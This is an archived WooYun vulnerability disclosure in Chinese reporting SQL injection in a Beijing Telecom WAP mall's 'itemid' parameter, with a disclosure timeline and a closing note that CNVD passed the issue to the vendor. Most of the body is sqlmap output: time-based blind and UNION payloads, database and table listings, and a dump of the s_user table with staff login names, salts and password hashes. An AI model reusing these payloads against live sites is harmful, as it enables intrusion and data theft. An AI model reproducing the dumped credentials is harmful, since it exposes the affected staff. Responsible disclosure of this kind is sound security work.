乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 细节已通知厂商并且等待厂商处理中 2015-09-10: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-20: 细节向核心白帽子及相关领域专家公开 2015-09-30: 细节向普通白帽子公开 2015-10-10: 细节向实习白帽子公开 2015-10-25: 细节向公众公开
北京电信WAP商城SQL注入
URL:http://**.**.**.**/?a=get_all_phonenum&g=wap&itemid=45参数:itemid
web application technology: PHP 5.5.15, Apacheback-end DBMS: MySQL 5.0.12current user is DBA: Falsesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://**.**.**.**:80/?a=get_all_phonenum&g=wap&itemid=45 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))NDis)-- lVld21=6 AND 613=613&keyword=0&m=item&order=2&p=1&price=0&rule_id=0 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: http://**.**.**.**:80/?a=get_all_phonenum&g=wap&itemid=45 AND 3 UNION ALL SELECT NULL,CONCAT(0x71787a6a71,0x5a6d4448556467694154,0x71706b7171),NULL,NULL,NULL,NULL,NULL-- 21=6 AND 613=613&keyword=0&m=item&order=2&p=1&price=0&rule_id=0---web application technology: PHP 5.5.15, Apacheback-end DBMS: MySQL 5.0.12available databases [3]:[*] bjwx[*] ej_bjmall[*] information_schema
数据库
表
管理员信息
用户数据
[16:11:29] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.5.15, Apacheback-end DBMS: MySQL 5.0.12[16:11:29] [INFO] fetching database namesavailable databases [3]:[*] bjwx[*] ej_bjmall[*] information_schema
Database: bjwx[92 tables]+-------------------------------+| Copy_of_act_broad || Copy_of_act_broad_clicks || Copy_of_act_broad_info || Copy_of_act_broad_rcd || act_birth || act_birth_awards || act_birth_rcd || act_ble_awards || act_ble_lottery || act_blessing || act_broad || act_broad_clicks || act_broad_info || act_broad_rcd || act_count || act_duanwu || act_film || act_film_awards || act_flow || act_focus || act_focus_awards || act_focus_rcd || act_gq4g || act_gq4g_info || act_head || act_head_rcd || act_hkd || act_hkd_award || act_hkd_rcd || act_ifree_share || act_ifree_share_award || act_ifree_tiger_sharelog || act_ifree_tiger_userinfo || act_jianmian || act_lan_lottery || act_nine || act_nine_awards || act_phone || act_phone_rcd || act_recommend || act_seven || act_seven_awards || act_seven_rcd || act_yb_awards || act_yb_awards_log || act_yd_awards || act_yd_awards_log || ej_account || ej_addr || ej_bjkf_template_flow || ej_code || ej_fans_info || ej_group || ej_group_fans_info || ej_hb_check || ej_ifree_qudao || ej_im_log || ej_im_status || ej_invalidUser || ej_jsapi_ticket || ej_kwd || ej_log || ej_login_log || ej_menu || ej_news || ej_operation || ej_operator_business || ej_operator_business_evaluate || ej_operator_query || ej_pay_order || ej_permission || ej_random || ej_rcd || ej_rcd_cd || ej_recharge || ej_role || ej_role_permission || ej_text || ej_user || ej_user_role || ej_warnOrder || ej_wxUser || ej_zgyyt_order || ej_zgyyt_product || ej_zgyyt_product_pic || pay_weixin_notify || pay_weixin_order || pay_weixin_recharge || s_task || s_user || sequence || ss_team |+-------------------------------+
Database: bjwxTable: s_user[5 entries]+----+--------+------------------+-------+------------------------------------------+------------+---------------------+| id | name | salt | roles | password | login_name | register_date |+----+--------+------------------+-------+------------------------------------------+------------+---------------------+| 1 | Admin | 2628abe029970cf2 | admin | 5f7a50e38c0c9032d8c31a457fa1c0d906f47973 | admin | 2012-06-04 01:00:00 || 3 | fengyw | 1e3a2a62bc70a4a5 | user | cad0b36f88d1a6753c8368fe71ef378809c70be2 | fengyw | 2014-09-17 19:50:37 || 4 | lingzh | 9058f9b7668e0da5 | user | c0af8afe74eadc86d812101efc906aaf6fa20b2f | lingzh | 2014-09-17 19:55:30 || 5 | wangph | 3f3a8e63104db6a2 | user | cac9da9309051acd1f09aae4f6fe4206f0da75cc | wangph | 2014-09-17 19:57:35 || 6 | huwj | ebf45974b86a6d60 | user | d2201259e36d0471ae42d9950b5a676f9ac44ae4 | huwj | 2014-09-17 20:00:10 |+----+--------+------------------+-------+------------------------------------------+------------+---------------------+
//
危害等级:中
漏洞Rank:10
确认时间:2015-09-10 17:16
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置
暂无